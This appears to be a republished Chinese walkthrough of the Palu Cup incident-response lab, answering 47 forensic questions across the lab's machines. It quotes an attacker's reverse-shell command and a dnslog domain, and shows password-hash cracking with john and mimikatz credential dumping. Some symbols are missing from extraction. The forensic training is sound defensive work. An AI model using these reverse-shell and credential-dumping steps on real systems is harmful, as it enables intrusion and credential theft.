帕鲁杯第二届应急响应:jumpserver,waf,mysql,sshserver,server01,Palu03,Palu02,每个靶机的漏洞总结

news2026/5/22 6:16:51
一、题目描述1.提交堡垒机中留下的flag2.提交waf中隐藏的flag3.提交mysql中留下的flag4.提交攻击者的攻击IP5.提交攻击者的最早攻击时间6.提交web服务泄露的关键文件名7.提交泄露的邮箱地址作为flag进行提交8.提交立足点服务器ip地址9.提交攻击者使用的提权用户密码10.提交攻击者留下的的文件内容11.提交权限维持方法服务的名称12.提交攻击者攻击恶意服务器连接地址13.找到系统中被劫持的程序程序名14.找到系统中存在信息泄露的服务运行端口15.提交Parloo公司项目经理的身份证号16.提交存在危险功能的操作系统路径17.提交进源机器中恶意程序的MD5作为flag进行提交18.提交攻击者留下的恶意账户名称md5后作为flag进行提交19.提交内部群中留下的flag并提交20.请提交攻击者使用维护页面获取到的敏感内容21.提交获取敏感内容IP的第一次执行命令时间22.提交攻击者使用的恶意ip和端口23.提交重要数据的明文内容24.提交恶意维权软件的名称25.提交恶意程序的外联地址26.提交攻击者使用的恶意dnslog域名27.提交寻找反序列化漏洞的端口28.提交web服务泄露的密钥29.提交攻击者开始攻击的时间30.提交攻击者在server中留下的账户密码31.提交攻击者维权方法的名称32.提交攻击者留下的木马md533.提交攻击者留下的溯源信息34.提交攻击者的githubID35.提交攻击者在github下留下的的内容36.提交恶意用户的数量37.提交恶意用户的默认密码38.提交业务数据中攻击者留下的信息39.提交私人git仓库中留下的内容40.提交存在在mysql服务器中的恶意程序的MD541.提交恶意程序中模拟c2通信的函数名称42.提交恶意程序创建隐藏文件的名称43.提交恶意程序中模拟权限提升的函数44.提交被钓鱼上线的用户名45.提交恶意程序的所在路径46.分析恶意程序的反连地址47.提交恶意c2的服务器登录的账号密码二根据靶机存在的漏洞排序(1)jumpserver1.堡垒机中的提交堡垒机中留下的flag在标签中(2)waf2.提交WAF中隐藏的FLAG在身份认证中随便输入点击配置就发现存在的flag4.提交攻击者的攻击IP注意是攻击查看攻击防护中的攻击看见有1108107进行攻击108是sshserver服务被控制后的攻击最早就算107进行攻击可以看出是1075.提交攻击者最早攻击的时间Palu{2025-05-05-00:04:40}看攻击事件中第一个107的事件或者看攻击中攻击未拦截的第一个6.web服务泄露的关键文件名第一种就是下载总的日志搜200返回看请求那些敏感信息2就算看路由里面的配置发现关键的txt文件7.题解泄露的邮箱地址访问泄露文件看见其中的地址http://192.168.20.102/bak/key.txt8.提交立足点服务器ip地址看见107先攻击后续108一直攻击可能被攻陷成为中间攻击靶机29.提交攻击者开始攻击的时间看waf日志里面[13/May/2025:16:45:19 0000](3)mysql3.提交mysql中留下的flag得下一个软件连接靶机本地没mysql服务端40.提交存在在mysql服务器中的恶意程序的MD5作为flag进行提交ba7c9fc1ff58b48d0df5c88d2fcc5cd141.提交恶意程序中模拟c2通信的函数名称作为flag进行提交登录root查看命令这个靶机因该是root权限被攻破不用输入密码可以转换把这个提取到home里面ida分析sudo cp /root/.a /home/ubuntIDA反汇编F5simulate_network_communication42.提交恶意程序创建隐藏文件的名称作为flag提交依旧IDA追踪查看create_hidden_file();函数得到文件隐藏名称。/tmp/.malware_log.txt43.提交恶意程序中模拟权限提升的函数作为flag进行提交simulate_privilege_escalation(4)sshserver9.提交攻击者使用的提权用户密码cat /etc/shadow 记得提权palu{parloo/parloo}$y$j9T$bLuVAsrL.71gbi6NQPhI/$lpN9vHI0MYs/YL19ERrpaRpdrc37f5ya520xe896iCjohn --wordlist/usr/share/wordlists/rockyou.txt hash.txtjohn --show hash.txt10.提交攻击者留下的的文件内容直接去parloo用户下找11.提交权限维持方法服务的名称ss -anutp查看当前系统所有的网络连接、端口监听状态以及这些连接对应的进程。systemctl status 811 822查看 PID 为822和811的进程对应的 systemd 服务状态。提权才能看见uid12.提交攻击者攻击恶意服务器连接地址查看网络连接时候暴露了反连的地址ss -anutp13.找到系统中被劫持的程序程序名/usr/bin 是什么它是 Linux 系统里存放绝大多数用户级可执行程序的默认目录像 id、ls、cat 这些命令本体都在这里ls -lt /usr/bin | head -n 10ls -lt按修改时间从新到旧排序文件-l 显示详情-t 按时间排序。head -n 10只显示前 10 个文件。所以这条命令的作用是列出 /usr/bin 里最近被修改过的 10 个文件帮你快速定位被篡改的程序。(5)server0114.找到系统中存在信息泄露的服务运行端口作为flag:查看提供的路径发现报错扫描一下靶机端口发现其中一个身份信息泄露{C:\Users\xiaonmap 192.168.20.103Starting Nmap 7.94 ( https://nmap.org ) at 2026-05-20 20:14 中国标准时间Nmap scan report for 192.168.20.103Host is up (0.0048s latency).Not shown: 992 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http222/tcp open rsh-spx443/tcp open https3000/tcp open ppp8080/tcp open http-proxy8081/tcp open blackice-icecap9999/tcp open abyssMAC Address: 00:0C:29:0A:A9:C9 (VMware)}15.提交Parloo公司项目经理的身份证号作为flag提交31010519851212345616.提交存在危险功能的操作系统路径作为flag提交去3000的git文档看敏感信息发现/admin/parloo用8080端口房屋内发现url的命令执行20.请提交攻击者使用维护页面获取到的敏感内容作为flag进行提交第一种就是登录进入看用户的历史记录.bash_history或者根据暴露的3000的日志名称搜索日志内容21.交获取敏感内容IP的第一次执行命令时间作为flag进行提交cat /var/log/parloo/command.log | grep 192.168.20.1直接搜匹配22.提交攻击者使用的恶意ip和端口flag格式为palu{xx.xx.xx.xx:xxxx}cat /var/log/parloo/command.log | grep 192.168.20.1bash -i /dev/tcp/10.12.12.13/9999 01kali的john -formatcrypt 1.txt1.txt保存$y$j9T$RlIs4rqy6D2PI46ntcuwZ0$WFD6WgX3XC4zp/5Y.Jq9yLcfhHK5Rdg6IeDq2Rrl79130.提交攻击者在server中留下的账户密码作为flag进行提交去cat /etc/shadow sudo提权parloohhack,123456Echo -n “$y$j9T$RlIs4rqy6D2PI46ntcuwZ0$WFD6WgX3XC4zp/5Y.Jq9yLcfhHK5Rdg6IeDq2Rrl791” hash.txtJohn -formatcrypt hash.txt31.提交攻击者维权方法的名称作为flag进行提交/home/parloohack/python3.3.py使用systemctl list-units --typeservice --all 来查看所有隐藏的进程32.留下的木马md5后作为flag提交parloohackubuntu:~$ md5sum aa4123940b3911556d4bf79196cc008bf4 aaparloohackubuntu:~$39.提交私人git仓库中留下的内容作为flag进行提交cGFsdXtGTzY1U3J1dVR1a2RwQlM1fQ登录server01看私有数据库然后利用数据库改admin的信息登录admin看见palu的里面有一个base64加密的(6)Palu0317.提交进源机器中恶意程序的MD5作为flag进行提交进入直接弹窗可能是恶意程序拖到桌面certutil -hashfile svhost.exe.exe MD518.提交攻击者留下的恶意账户名称md5后作为flag进行提交就算hack19.提交内部群中留下的flag并提交:parlo群子怡说了一个flag23.提交重要数据的内容作为flag提交去parloo3找重要数据然后去git里面登录hack有数据库直接替换新建的账号的密码然后爆破密码跑这个def custom_decrypt(ciphertext, key):decrypted []key_bytes [ord(c) for c in key]for i in range(0, len(ciphertext), 2):hex_byte ciphertext[i:i 2]substituted int(hex_byte, 16)xored ((substituted 0x0F) 4) | ((substituted 0xF0) 4)xor_key key_bytes[(i // 2) % len(key_bytes)]shifted xored ^ xor_keyoriginal_char_code shifted - ((i // 2) % 5 1)decrypted.append(chr(original_char_code))return .join(decrypted)key MySecretKeyciphertext c3a1c3c13e326020c3919093e1260525045eplaintext custom_decrypt(ciphertext, key)print(plaintext)24.提交恶意维权软件的名称作为flag进行提交就是之前的svhost25.提交恶意程序的外联地址用everything扫描从时间找到比如py的第三方图标的用pyinstxtractor提取 出一个恶意程序1.pyc再反编译找地址26.提交攻击这使用的恶意dnslog域名作为flag进行提交np85qqde.requestrepo.comcat /var/log/parloo/command.log | grep 192.168.20.1这个里面找历史记录27.提交寻找反序列化漏洞的端口作为flag进行提交9999要找反序列化漏洞要在网站等应用中找先看看webserver的网站吧但是发现它们两个都是808180静态网站不会用到序列化排除。再看看waf给出的网站列表看看102:9999的情况尝试登录一下没看出POST做了什么反序列化抓个包试试。结果也是没有反序列化。再看看雷池WAF中的攻击日志过滤未拦截的反序列化根据相应内容只有9999这个302重定向了。28.提交web服务泄露的密钥作为flag进行提交heapdump下两个工具(7)Palu0233.提交攻击者留下的溯源信息作为flag进行提交其他机器都没有谷歌浏览器唯独PC2有翻设置和历史翻到保存密码34.提交攻击者的githubID作为flag进行提交用QQ搜是一个QQ号码但是加不了好友也没有签名用空间看一下帕鲁的QQ空间得到Palu{ParlooSEc},有问题的是他的只能看一年以内的35.提交攻击者在github下留下的的内容作为flag进行提交也是需要联网才能搜索到的palu{s5o3WkX33hptyJjk}44.提交被钓鱼上线的用户名作为flag进行提交发给子怡的点击后子怡就算上当的45.提交恶意程序的所在路径作为flag进行提交\..\..\..\..\parloo-沉沉46.分析恶意程序的反连地址作为flag进行提交地址意思就是可能使用goole进入看看历史47.101.213.15347.提交恶意c2的服务器登录的账号密码作为flag进行提交。flag格式为palu{username/password}adminadminqwer(8)Palu0136.提交恶意用户的数量作为flag进行提交net user37.提交恶意用户的默认密码作为flag进行提交privilege::debugsekurlsa::logonpasswords //失败token::elevate //提升权限lsadump::sam //抓取NTLM的hash密码12345638.提交业务数据中攻击者留下的信息作为flag进行提交之前在数据库中还有一个flag提交

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2633888.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…